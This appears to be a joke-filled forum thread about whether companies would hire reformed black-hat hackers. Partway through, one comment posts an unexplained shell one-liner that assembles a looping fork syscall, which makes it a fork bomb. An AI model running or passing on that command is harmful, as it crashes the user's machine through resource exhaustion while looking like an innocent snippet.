Would You Hire a Former Black Hat?
Mark Zenson asks: "Understanding the mindset of a hacker and the likes of one may be useful to counter security attacks, but apparently companies still object to hiring former, or even reformed, black hats."
The article asks this question of several executives in the industry and for various reasons, many of them were skeptical to the idea of hiring such people. Would you give black hats a second chance if you were in their position?
If I worked at Hewlett-Packard.
we will end no whine before its time
Would you give black hats a second chance if you were in there position? Satisfied?
Man, you are really badass.
Can they work with people?
I never killed a coworker. You can't do much damage with a cheap keyboard, no matter how hard you swing it.
You have Dells, right? No problem. Wow, I aced this one.
Can they dress well?
Most days, I can pull on a pair of pants and grab a T shirt off the floor as I walk out the door. I find I'm more productive barefoot.
Do they shower?
Once I got pretty wet cycling to the office on my BMX.
Are they capable of staying after normal work hours every now and then to see to something getting finished?
I'll stay till noon if I was too busy to get the work done at night.
Are they sensitive to other people and their surroundings?
You bet I'm sensitive. Hell, ask my ex boss. I'd have called him for a reference if it wasn't for the court order.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
So... shouldn't you be working on that bug?
There are always risks involved, but excluding top 1/3 of candidates from your list is stupid. If you are good at something, chances are you played around a bit in your formative years.
.....police vehicles don't signal their turns or lane changes.
OMG!
My wife must be an undercover police officer!